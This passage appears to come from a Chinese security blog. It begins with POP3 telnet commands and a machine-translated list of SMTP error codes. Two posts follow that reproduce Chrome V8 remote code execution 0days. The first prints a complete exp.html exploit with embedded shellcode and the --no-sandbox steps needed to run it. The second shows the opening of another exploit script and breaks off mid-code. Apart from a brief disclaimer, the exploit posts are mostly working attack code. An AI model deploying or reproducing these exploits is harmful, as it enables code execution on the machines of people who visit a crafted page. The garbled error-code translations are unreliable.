<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">telnet pop.163.com 110 <span class="comment"># telnet连接</span></span><br><span class="line">user **** <span class="comment"># 用户名</span></span><br><span class="line">pass **** <span class="comment"># 密码</span></span><br><span class="line">+OK 24 message(s) [643260 byte(s)] <span class="comment"># 成功会显示OK 24代表24封邮件 643260代表总邮件的字节数</span></span><br><span class="line"></span><br><span class="line">命令列表</span><br><span class="line"><span class="built_in">stat</span> <span class="comment">#查看统计,执行后,POP3服务器会响应一个正确应答,它以“+OK”开头,接着是两个数字,第一个是邮件数目,第二个是邮件的大小</span></span><br><span class="line">list <span class="comment">#格式list [n] 参数n可选,n为邮件编号;查看邮件列表</span></span><br><span class="line">uidl <span class="comment">#格式uidl [n] 参数n可选,n为邮件编号;查看邮件唯一邮件标识码</span></span><br><span class="line">retr <span class="comment">#格式retr [n] 参数n可选,n为邮件编号;查看邮件的内容</span></span><br><span class="line">dele <span class="comment">#格式dele [n] 参数n可选,n为邮件编号;删除指定的邮件(注意:dele n命令只是给邮件做上删除标记,只有在执行quit命令之后,邮件才会真正删除)</span></span><br><span class="line">top <span class="comment">#格式top [n][m] 参数n m 必选,n为邮件编号,m为行数;读取指定邮件正文的行数,如果m=0,则只读出邮件的邮件头部分</span></span><br><span class="line">noop <span class="comment">#POP3服务器不执行任何操作,仅返回一个正确响应"+OK"</span></span><br><span class="line">quit <span class="comment">#退出</span></span><br></pre></td></tr></table></figure>
<h5 id="错误代码"><a href="#错误代码" class="headerlink" title="错误代码"></a>错误代码</h5><figure class="highlight angelscript"><table><tr><td class="code"><pre><span class="line"><span class="number">4</span>xx代码:</span><br><span class="line"> <span class="number">421</span>个#<span class="number">4.4</span><span class="number">.5</span>此时的许多TLS会话</span><br><span class="line"> <span class="number">421</span>个#<span class="number">4.4</span><span class="number">.5</span>从您的主机的许多连接</span><br><span class="line"> <span class="number">421</span>个#<span class="number">4.4</span><span class="number">.5</span>对此的许多连接主机</span><br><span class="line"> <span class="number">421</span>个#<span class="number">4.4</span><span class="number">.5</span>对此监听程序的许多连接</span><br><span class="line"> <span class="number">421</span>个#<span class="number">4.</span>x<span class="number">.2</span>此会话的许多消息</span><br><span class="line"> <span class="number">421</span>不可用<hostname>的服务,关闭处理信道</span><br><span class="line"> <span class="number">421</span>超出了允许的连接时间</span><br><span class="line"> <span class="number">421</span>超过了坏SMTP命令限制,断开</span><br><span class="line"> 评估许可证超时的<span class="number">421</span></span><br><span class="line"> <span class="number">451</span>个#<span class="number">4.3</span><span class="number">.0</span>服务器错误</span><br><span class="line"> <span class="number">452</span>个#<span class="number">4.3</span><span class="number">.1</span>全双工的队列</span><br><span class="line"> <span class="number">452</span>种#<span class="number">4.3</span><span class="number">.1</span>以后服务器资源低的再试一次</span><br><span class="line"> <span class="number">452</span>个#<span class="number">4.3</span><span class="number">.1</span>临时系统错误(<span class="number">12</span>)</span><br><span class="line"> <span class="number">452</span>个#<span class="number">4.5</span><span class="number">.3</span>许多收件人</span><br><span class="line"> <span class="number">454</span> TLS不可用由于一个临时原因</span><br><span class="line"></span><br><span class="line"><span class="number">5</span>xx代码:</span><br><span class="line"> <span class="number">500</span>个#<span class="number">5.5</span><span class="number">.1</span>没被认可的命令</span><br><span class="line"> <span class="number">500</span>太长的线路</span><br><span class="line"> <span class="number">501</span> #<span class="number">5.0</span><span class="number">.0</span> EHLO要求域地址</span><br><span class="line"> <span class="number">501</span>个#<span class="number">5.5</span><span class="number">.2</span>语法错误XXX</span><br><span class="line"> 对验证命令的<span class="number">501</span>个#<span class="number">5.5</span><span class="number">.4</span>无效参数</span><br><span class="line"> <span class="number">501</span>未知xxx命令</span><br><span class="line"> <span class="number">501</span>未知的选项XXX</span><br><span class="line"> <span class="number">501</span>未知值XXX</span><br><span class="line"> 不可用<span class="number">503</span> #<span class="number">5.3</span><span class="number">.3</span>的验证</span><br><span class="line"> 在邮件处理时没允许的<span class="number">503</span> #<span class="number">5.5</span><span class="number">.0</span>验证</span><br><span class="line"> 已经验证的<span class="number">503</span>个#<span class="number">5.5</span><span class="number">.0</span></span><br><span class="line"> 首先<span class="number">503</span> #<span class="number">5.5</span><span class="number">.1</span> MAIL</span><br><span class="line"> 首先<span class="number">503</span> #<span class="number">5.5</span><span class="number">.1</span> RCPT</span><br><span class="line"> <span class="number">503</span> commandsDATA Bad顺序在mailmerge处理内的</span><br><span class="line"> <span class="number">503</span> commandsXPRT Bad顺序在无格式处理内的</span><br><span class="line"> <span class="number">503</span>接收零件的commandsnow Bad顺序</span><br><span class="line"> <span class="number">503</span>不在mailmerge处理</span><br><span class="line"> <span class="number">504</span>个#<span class="number">5.5</span><span class="number">.1</span>验证机制XXX不是可用的</span><br><span class="line"> <span class="number">504</span>命令参数XXX无法识别</span><br><span class="line"> <span class="number">504</span>个无效XDFN语法</span><br><span class="line"> <span class="number">504</span>无效部件号</span><br><span class="line"> <span class="number">504</span>无效部件号XXX</span><br><span class="line"> <span class="number">504</span>没有指定的可变值</span><br><span class="line"> 仍然未命中其他<span class="number">504</span>的部分</span><br><span class="line"> <span class="number">504</span>保留变量名称</span><br><span class="line"> <span class="number">504</span>在*parts语法的语法错误</span><br><span class="line"> <span class="number">504</span>个XDFN命令不能包含零字符</span><br><span class="line"> <span class="number">530</span>个#<span class="number">5.7</span><span class="number">.0</span>必须首先发出STARTTLS命令</span><br><span class="line"> <span class="number">530</span>个#<span class="number">5.7</span><span class="number">.0</span>此发送方必须首先发出STARTTLS命令</span><br><span class="line"> 要求的<span class="number">530</span>验证</span><br><span class="line"> <span class="number">538</span>个#<span class="number">5.7</span><span class="number">.11</span>要求的加密</span><br><span class="line"> <span class="number">552</span>个#<span class="number">5.3</span><span class="number">.4</span>信息标题大小超过限制</span><br><span class="line"> <span class="number">552</span>个#<span class="number">5.3</span><span class="number">.4</span>消息大小超过限制</span><br><span class="line"> <span class="number">552</span>超过的大小限制</span><br><span class="line"> <span class="number">554</span>个#<span class="number">5.3</span><span class="number">.0</span>服务器错误</span><br><span class="line"> <span class="number">554</span>许多跳</span><br><span class="line"> <span class="number">554</span>消息主题包含非法仅有的CR/LF字符。</span><br></pre></td></tr></table></figure>]]></content>
<tags>
<tag>mail</tag>
</tags>
</entry>
<entry>
<title>chrome 0day 远程代码执行</title>
<url>/2021/04/14/chrome-0day0414/</url>
<content><![CDATA[<p>本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。</p>
<div style="text-align: right"> 小维</div>
<h4 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>漏洞描述</h4><p>2021年4月14日,互联网上公开了一份Chrome V8引擎远程代码执行0day漏洞POC,攻击者可通过构造特制web页面并诱导受害者访问来利用此漏洞获得远程代码执行。</p>
<p>Google Chrome是由Google开发的免费网页浏览器。许多第三方浏览器使用Chromium内核,这些浏览器同样会受该0day漏洞影响。</p>
<h4 id="影响版本"><a href="#影响版本" class="headerlink" title="影响版本"></a>影响版本</h4><p>Google Chrome <= 90.0.4430.72</p>
<a id="more"></a>
<p>基于Chromium内核的Microsoft Edge <= 89.0.774.77</p>
<p>其他基于V8引擎的第三方浏览器</p>
<h4 id="版本介绍"><a href="#版本介绍" class="headerlink" title="版本介绍"></a>版本介绍</h4><figure class="highlight angelscript"><table><tr><td class="code"><pre><span class="line">Google Chrome v90<span class="number">.0</span><span class="number">.4430</span><span class="number">.72</span></span><br><span class="line">Microsoft Edge v89<span class="number">.0</span><span class="number">.774</span><span class="number">.77</span></span><br></pre></td></tr></table></figure>
<p><img src="/img/chrome-0day0414/image-20210415113316603.png" alt="image-20210415113316603"></p>
<p><img src="/img/chrome-0day0414/image-20210415113459461.png" alt="image-20210415113459461"></p>
<h4 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h4><p>exp.html</p>
<figure class="highlight html"><table><tr><td class="code"><pre><span class="line"><span class="tag"><<span class="name">script</span>></span></span><br><span class="line"><span class="actionscript"> <span class="function"><span class="keyword">function</span> <span class="title">gc</span><span class="params">()</span> </span>{</span></span><br><span class="line"><span class="actionscript"> <span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i < <span class="number">0x80000</span>; ++i) {</span></span><br><span class="line"><span class="javascript"> <span class="keyword">var</span> a = <span class="keyword">new</span> <span class="built_in">ArrayBuffer</span>();</span></span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"><span class="javascript"> <span class="keyword">let</span> shellcode = [<span class="number">0xFC</span>, <span class="number">0x48</span>, <span class="number">0x83</span>, <span class="number">0xE4</span>, <span class="number">0xF0</span>, <span class="number">0xE8</span>, <span class="number">0xC0</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x41</span>, <span class="number">0x51</span>, <span class="number">0x41</span>, <span class="number">0x50</span>, <span class="number">0x52</span>, <span class="number">0x51</span>,</span></span><br><span class="line"> 0x56, 0x48, 0x31, 0xD2, 0x65, 0x48, 0x8B, 0x52, 0x60, 0x48, 0x8B, 0x52, 0x18, 0x48, 0x8B, 0x52,</span><br><span class="line"> 0x20, 0x48, 0x8B, 0x72, 0x50, 0x48, 0x0F, 0xB7, 0x4A, 0x4A, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0,</span><br><span class="line"> 0xAC, 0x3C, 0x61, 0x7C, 0x02, 0x2C, 0x20, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1, 0xE2, 0xED,</span><br><span class="line"> 0x52, 0x41, 0x51, 0x48, 0x8B, 0x52, 0x20, 0x8B, 0x42, 0x3C, 0x48, 0x01, 0xD0, 0x8B, 0x80, 0x88,</span><br><span class="line"> 0x00, 0x00, 0x00, 0x48, 0x85, 0xC0, 0x74, 0x67, 0x48, 0x01, 0xD0, 0x50, 0x8B, 0x48, 0x18, 0x44,</span><br><span class="line"> 0x8B, 0x40, 0x20, 0x49, 0x01, 0xD0, 0xE3, 0x56, 0x48, 0xFF, 0xC9, 0x41, 0x8B, 0x34, 0x88, 0x48,</span><br><span class="line"> 0x01, 0xD6, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0, 0xAC, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1,</span><br><span class="line"> 0x38, 0xE0, 0x75, 0xF1, 0x4C, 0x03, 0x4C, 0x24, 0x08, 0x45, 0x39, 0xD1, 0x75, 0xD8, 0x58, 0x44,</span><br><span class="line"> 0x8B, 0x40, 0x24, 0x49, 0x01, 0xD0, 0x66, 0x41, 0x8B, 0x0C, 0x48, 0x44, 0x8B, 0x40, 0x1C, 0x49,</span><br><span class="line"> 0x01, 0xD0, 0x41, 0x8B, 0x04, 0x88, 0x48, 0x01, 0xD0, 0x41, 0x58, 0x41, 0x58, 0x5E, 0x59, 0x5A,</span><br><span class="line"> 0x41, 0x58, 0x41, 0x59, 0x41, 0x5A, 0x48, 0x83, 0xEC, 0x20, 0x41, 0x52, 0xFF, 0xE0, 0x58, 0x41,</span><br><span class="line"> 0x59, 0x5A, 0x48, 0x8B, 0x12, 0xE9, 0x57, 0xFF, 0xFF, 0xFF, 0x5D, 0x48, 0xBA, 0x01, 0x00, 0x00,</span><br><span class="line"> 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x8D, 0x01, 0x01, 0x00, 0x00, 0x41, 0xBA, 0x31, 0x8B,</span><br><span class="line"> 0x6F, 0x87, 0xFF, 0xD5, 0xBB, 0xF0, 0xB5, 0xA2, 0x56, 0x41, 0xBA, 0xA6, 0x95, 0xBD, 0x9D, 0xFF,</span><br><span class="line"> 0xD5, 0x48, 0x83, 0xC4, 0x28, 0x3C, 0x06, 0x7C, 0x0A, 0x80, 0xFB, 0xE0, 0x75, 0x05, 0xBB, 0x47,</span><br><span class="line"> 0x13, 0x72, 0x6F, 0x6A, 0x00, 0x59, 0x41, 0x89, 0xDA, 0xFF, 0xD5, 0x6E, 0x6F, 0x74, 0x65, 0x70,</span><br><span class="line"> 0x61, 0x64, 0x2E, 0x65, 0x78, 0x65, 0x00];</span><br><span class="line"><span class="javascript"> <span class="keyword">var</span> wasmCode = <span class="keyword">new</span> <span class="built_in">Uint8Array</span>([<span class="number">0</span>, <span class="number">97</span>, <span class="number">115</span>, <span class="number">109</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">133</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">96</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">127</span>, <span class="number">3</span>, <span class="number">130</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">4</span>, <span class="number">132</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">112</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">5</span>, <span class="number">131</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">6</span>, <span class="number">129</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">7</span>, <span class="number">145</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">0</span>, <span class="number">2</span>, <span class="number">6</span>, <span class="number">109</span>, <span class="number">101</span>, <span class="number">109</span>, <span class="number">111</span>, <span class="number">114</span>, <span class="number">121</span>, <span class="number">2</span>, <span class="number">0</span>, <span class="number">4</span>, <span class="number">109</span>, <span class="number">97</span>, <span class="number">105</span>, <span class="number">110</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">10</span>, <span class="number">138</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">132</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">65</span>, <span class="number">42</span>, <span class="number">11</span>]);</span></span><br><span class="line"><span class="actionscript"> <span class="keyword">var</span> wasmModule = <span class="keyword">new</span> WebAssembly.Module(wasmCode);</span></span><br><span class="line"><span class="actionscript"> <span class="keyword">var</span> wasmInstance = <span class="keyword">new</span> WebAssembly.Instance(wasmModule);</span></span><br><span class="line"><span class="actionscript"> <span class="keyword">var</span> main = wasmInstance.exports.main;</span></span><br><span class="line"><span class="javascript"> <span class="keyword">var</span> bf = <span class="keyword">new</span> <span class="built_in">ArrayBuffer</span>(<span class="number">8</span>);</span></span><br><span class="line"><span class="javascript"> <span class="keyword">var</span> bfView = <span class="keyword">new</span> <span class="built_in">DataView</span>(bf);</span></span><br><span class="line"><span class="actionscript"> <span class="function"><span class="keyword">function</span> <span class="title">fLow</span><span class="params">(f)</span> </span>{</span></span><br><span class="line"><span class="actionscript"> bfView.setFloat64(<span class="number">0</span>, f, <span class="literal">true</span>);</span></span><br><span class="line"><span class="actionscript"> <span class="keyword">return</span> (bfView.getUint32(<span class="number">0</span>, <span class="literal">true</span>));</span></span><br><span class="line"> }</span><br><span class="line"><span class="actionscript"> <span class="function"><span class="keyword">function</span> <span class="title">fHi</span><span class="params">(f)</span> </span>{</span></span><br><span class="line"><span class="actionscript"> bfView.setFloat64(<span class="number">0</span>, f, <span class="literal">true</span>);</span></span><br><span class="line"><span class="actionscript"> <span class="keyword">return</span> (bfView.getUint32(<span class="number">4</span>, <span class="literal">true</span>))</span></span><br><span class="line"> }</span><br><span class="line"><span class="actionscript"> <span class="function"><span class="keyword">function</span> <span class="title">i2f</span><span class="params">(low, hi)</span> </span>{</span></span><br><span class="line"><span class="actionscript"> bfView.setUint32(<span class="number">0</span>, low, <span class="literal">true</span>);</span></span><br><span class="line"><span class="actionscript"> bfView.setUint32(<span class="number">4</span>, hi, <span class="literal">true</span>);</span></span><br><span class="line"><span class="actionscript"> <span class="keyword">return</span> bfView.getFloat64(<span class="number">0</span>, <span class="literal">true</span>);</span></span><br><span class="line"> }</span><br><span class="line"><span class="actionscript"> <span class="function"><span class="keyword">function</span> <span class="title">f2big</span><span class="params">(f)</span> </span>{</span></span><br><span class="line"><span class="actionscript"> bfView.setFloat64(<span class="number">0</span>, f, <span class="literal">true</span>);</span></span><br><span class="line"><span class="actionscript"> <span class="keyword">return</span> bfView.getBigUint64(<span class="number">0</span>, <span class="literal">true</span>);</span></span><br><span class="line"> }</span><br><span class="line"><span class="actionscript"> <span class="function"><span class="keyword">function</span> <span class="title">big2f</span><span class="params">(b)</span> </span>{</span></span><br><span class="line"><span class="actionscript"> bfView.setBigUint64(<span class="number">0</span>, b, <span class="literal">true</span>);</span></span><br><span class="line"><span class="actionscript"> <span class="keyword">return</span> bfView.getFloat64(<span class="number">0</span>, <span class="literal">true</span>);</span></span><br><span class="line"> }</span><br><span class="line"><span class="actionscript"> <span class="class"><span class="keyword">class</span> <span class="title">LeakArrayBuffer</span> <span class="keyword">extends</span> <span class="title">ArrayBuffer</span> </span>{</span></span><br><span class="line"><span class="javascript"> <span class="keyword">constructor</span>(size) {</span></span><br><span class="line"><span class="actionscript"> <span class="keyword">super</span>(size);</span></span><br><span class="line"><span class="actionscript"> <span class="keyword">this</span>.slot = <span class="number">0xb33f</span>;</span></span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"><span class="actionscript"> <span class="function"><span class="keyword">function</span> <span class="title">foo</span><span class="params">(a)</span> </span>{</span></span><br><span class="line"><span class="javascript"> <span class="keyword">let</span> x = <span class="number">-1</span>;</span></span><br><span class="line"> if (a) x = 0xFFFFFFFF;</span><br><span class="line"><span class="javascript"> <span class="keyword">var</span> arr = <span class="keyword">new</span> <span class="built_in">Array</span>(<span class="built_in">Math</span>.sign(<span class="number">0</span> - <span class="built_in">Math</span>.max(<span class="number">0</span>, x, <span class="number">-1</span>)));</span></span><br><span class="line"> arr.shift();</span><br><span class="line"><span class="javascript"> <span class="keyword">let</span> local_arr = <span class="built_in">Array</span>(<span class="number">2</span>);</span></span><br><span class="line"><span class="actionscript"> local_arr[<span class="number">0</span>] = <span class="number">5.1</span>;<span class="comment">//4014666666666666</span></span></span><br><span class="line"><span class="javascript"> <span class="keyword">let</span> buff = <span class="keyword">new</span> LeakArrayBuffer(<span class="number">0x1000</span>);<span class="comment">//byteLength idx=8</span></span></span><br><span class="line"> arr[0] = 0x1122;</span><br><span class="line"><span class="actionscript"> <span class="keyword">return</span> [arr, local_arr, buff];</span></span><br><span class="line"> }</span><br><span class="line"><span class="actionscript"> <span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i < <span class="number">0x10000</span>; ++i)</span></span><br><span class="line"><span class="actionscript"> foo(<span class="literal">false</span>);</span></span><br><span class="line"> gc(); gc();</span><br><span class="line"><span class="actionscript"> [corrput_arr, rwarr, corrupt_buff] = foo(<span class="literal">true</span>);</span></span><br><span class="line"> corrput_arr[12] = 0x22444;</span><br><span class="line"><span class="actionscript"> <span class="keyword">delete</span> corrput_arr;</span></span><br><span class="line"><span class="actionscript"> <span class="function"><span class="keyword">function</span> <span class="title">setbackingStore</span><span class="params">(hi, low)</span> </span>{</span></span><br><span class="line"> rwarr[4] = i2f(fLow(rwarr[4]), hi);</span><br><span class="line"> rwarr[5] = i2f(low, fHi(rwarr[5]));</span><br><span class="line"> }</span><br><span class="line"><span class="actionscript"> <span class="function"><span class="keyword">function</span> <span class="title">leakObjLow</span><span class="params">(o)</span> </span>{</span></span><br><span class="line"> corrupt_buff.slot = o;</span><br><span class="line"><span class="actionscript"> <span class="keyword">return</span> (fLow(rwarr[<span class="number">9</span>]) - <span class="number">1</span>);</span></span><br><span class="line"> }</span><br><span class="line"><span class="javascript"> <span class="keyword">let</span> corrupt_view = <span class="keyword">new</span> <span class="built_in">DataView</span>(corrupt_buff);</span></span><br><span class="line"><span class="javascript"> <span class="keyword">let</span> corrupt_buffer_ptr_low = leakObjLow(corrupt_buff);</span></span><br><span class="line"><span class="javascript"> <span class="keyword">let</span> idx0Addr = corrupt_buffer_ptr_low - <span class="number">0x10</span>;</span></span><br><span class="line"><span class="javascript"> <span class="keyword">let</span> baseAddr = (corrupt_buffer_ptr_low & <span class="number">0xffff0000</span>) - ((corrupt_buffer_ptr_low & <span class="number">0xffff0000</span>) % <span class="number">0x40000</span>) + <span class="number">0x40000</span>;</span></span><br><span class="line"><span class="javascript"> <span class="keyword">let</span> delta = baseAddr + <span class="number">0x1c</span> - idx0Addr;</span></span><br><span class="line"> if ((delta % 8) == 0) {</span><br><span class="line"><span class="javascript"> <span class="keyword">let</span> baseIdx = delta / <span class="number">8</span>;</span></span><br><span class="line"><span class="actionscript"> <span class="keyword">this</span>.base = fLow(rwarr[baseIdx]);</span></span><br><span class="line"><span class="actionscript"> } <span class="keyword">else</span> {</span></span><br><span class="line"><span class="javascript"> <span class="keyword">let</span> baseIdx = ((delta - (delta % <span class="number">8</span>)) / <span class="number">8</span>);</span></span><br><span class="line"><span class="actionscript"> <span class="keyword">this</span>.base = fHi(rwarr[baseIdx]);</span></span><br><span class="line"> }</span><br><span class="line"><span class="javascript"> <span class="keyword">let</span> wasmInsAddr = leakObjLow(wasmInstance);</span></span><br><span class="line"><span class="actionscript"> setbackingStore(wasmInsAddr, <span class="keyword">this</span>.base);</span></span><br><span class="line"><span class="javascript"> <span class="keyword">let</span> code_entry = corrupt_view.getFloat64(<span class="number">13</span> * <span class="number">8</span>, <span class="literal">true</span>);</span></span><br><span class="line"> setbackingStore(fLow(code_entry), fHi(code_entry));</span><br><span class="line"><span class="javascript"> <span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i < shellcode.length; i++) {</span></span><br><span class="line"> corrupt_view.setUint8(i, shellcode[i]);</span><br><span class="line"> }</span><br><span class="line"> main();</span><br><span class="line"><span class="tag"></<span class="name">script</span>></span></span><br></pre></td></tr></table></figure>
<p>关闭浏览器沙箱</p>
<figure class="highlight taggerscript"><table><tr><td class="code"><pre><span class="line">#退出浏览器进程进行打开</span><br><span class="line">Chrome:</span><br><span class="line">"C:<span class="symbol">\P</span>rogram Files (x86)<span class="symbol">\G</span>oogle<span class="symbol">\C</span>hrome<span class="symbol">\A</span>pplication<span class="symbol">\c</span>hrome.exe" -no-sandbox</span><br><span class="line">或</span><br><span class="line">"C:<span class="symbol">\P</span>rogram Files (x86)<span class="symbol">\G</span>oogle<span class="symbol">\C</span>hrome<span class="symbol">\A</span>pplication<span class="symbol">\c</span>hrome.exe" --args --no-sandbox</span><br><span class="line"></span><br><span class="line">Edge:</span><br><span class="line">"C:<span class="symbol">\P</span>rogram Files (x86)<span class="symbol">\M</span>icrosoft<span class="symbol">\E</span>dge<span class="symbol">\A</span>pplication<span class="symbol">\m</span>sedge.exe" -no-sandbox</span><br><span class="line">或</span><br><span class="line">"C:<span class="symbol">\P</span>rogram Files (x86)<span class="symbol">\M</span>icrosoft<span class="symbol">\E</span>dge<span class="symbol">\A</span>pplication<span class="symbol">\m</span>sedge.exe" --args --no-sandbox</span><br></pre></td></tr></table></figure>
<p><img src="/img/chrome-0day0414/image-20210415114004777.png" alt="image-20210415114004777"></p>
<p>弹出记事本</p>
<p><img src="/img/chrome-0day0414/image-20210415114255029.png" alt="image-20210415114255029"></p>
<h4 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h4><p><a href="https://github.com/avboy1337/1195777-chrome0day" target="_blank" rel="noopener">https://github.com/avboy1337/1195777-chrome0day</a></p>
<p><a href="https://mp.weixin.qq.com/s/gVBsX62O3qaF4JxLsIGI5Q" target="_blank" rel="noopener">https://mp.weixin.qq.com/s/gVBsX62O3qaF4JxLsIGI5Q</a></p>
]]></content>
<tags>
<tag>漏洞复现</tag>
</tags>
</entry>
<entry>
<title>Chrome 远程代码执行漏洞</title>
<url>/2021/04/13/chrome%200day/</url>
<content><![CDATA[<p>本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。</p>
<div style="text-align: right"> 小维</div>
<h4 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>漏洞描述</h4><p>2021年04月13日,发现国外安全研究发布了Chrome 远程代码执行 0Day的POC详情~</p>
<h4 id="影响版本"><a href="#影响版本" class="headerlink" title="影响版本"></a>影响版本</h4><p>Google Chrome: <=89.0.4389.114</p>
<p>基与chrome内核的其他浏览器</p>
<a id="more"></a>
<h4 id="环境介绍"><a href="#环境介绍" class="headerlink" title="环境介绍"></a>环境介绍</h4><p>Google Chrome: 89.0.4389.114</p>
<p><img src="/img/chrome%200day/image-20210413161555848.png" alt="image-20210413161555848"></p>
<h4 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h4><p>exploit js文件</p>
<figure class="highlight lsl"><table><tr><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">BSD 2-Clause License</span></span><br><span class="line"><span class="comment">Copyright (c) 2021, rajvardhan agarwal</span></span><br><span class="line"><span class="comment">All rights reserved.</span></span><br><span class="line"><span class="comment">Redistribution and use in source and binary forms, with or without</span></span><br><span class="line"><span class="comment">modification, are permitted provided that the following conditions are met:</span></span><br><span class="line"><span class="comment">1. Redistributions of source code must retain the above copyright notice, this</span></span><br><span class="line"><span class="comment"> list of conditions and the following disclaimer.</span></span><br><span class="line"><span class="comment">2. Redistributions in binary form must reproduce the above copyright notice,</span></span><br><span class="line"><span class="comment"> this list of conditions and the following disclaimer in the documentation</span></span><br><span class="line"><span class="comment"> and/or other materials provided with the distribution.</span></span><br><span class="line"><span class="comment">THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"</span></span><br><span class="line"><span class="comment">AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE</span></span><br><span class="line"><span class="comment">IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE</span></span><br><span class="line"><span class="comment">DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE</span></span><br><span class="line"><span class="comment">FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL</span></span><br><span class="line"><span class="comment">DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR</span></span><br><span class="line"><span class="comment">SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER</span></span><br><span class="line"><span class="comment">CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,</span></span><br><span class="line"><span class="comment">OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE</span></span><br><span class="line"><span class="comment">OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"></span><br><span class="line">var wasm_code = new Uint8Array([<span class="number">0</span>,<span class="number">97</span>,<span class="number">115</span>,<span class="number">109</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">133</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">96</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">127</span>,<span class="number">3</span>,<span class="number">130</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">4</span>,<span class="number">132</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">112</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">5</span>,<span class="number">131</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">6</span>,<span class="number">129</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">7</span>,<span class="number">145</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">2</span>,<span class="number">6</span>,<span class="number">109</span>,<span class="number">101</span>,<span class="number">109</span>,<span class="number">111</span>,<span class="number">114</span>,<span class="number">121</span>,<span class="number">2</span>,<span class="number">0</span>,<span class="number">4</span>,<span class="number">109</span>,<span class="number">97</span>,<span class="number">105</span>,<span class="number">110</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">10</span>,<span class="number">138</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">132</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">65</span>,<span class="number">42</span>,<span class="number">11</span>])</span><br><span class="line">var wasm_mod = new WebAssembly.Module(wasm_code);</span><br><span class="line">var wasm_instance = new WebAssembly.Instance(wasm_mod);</span><br><span class="line">var f = wasm_instance.exports.main;</span><br><span class="line"></span><br><span class="line">var buf = new ArrayBuffer(<span class="number">8</span>);</span><br><span class="line">var f64_buf = new Float64Array(buf);</span><br><span class="line">var u64_buf = new Uint32Array(buf);</span><br><span 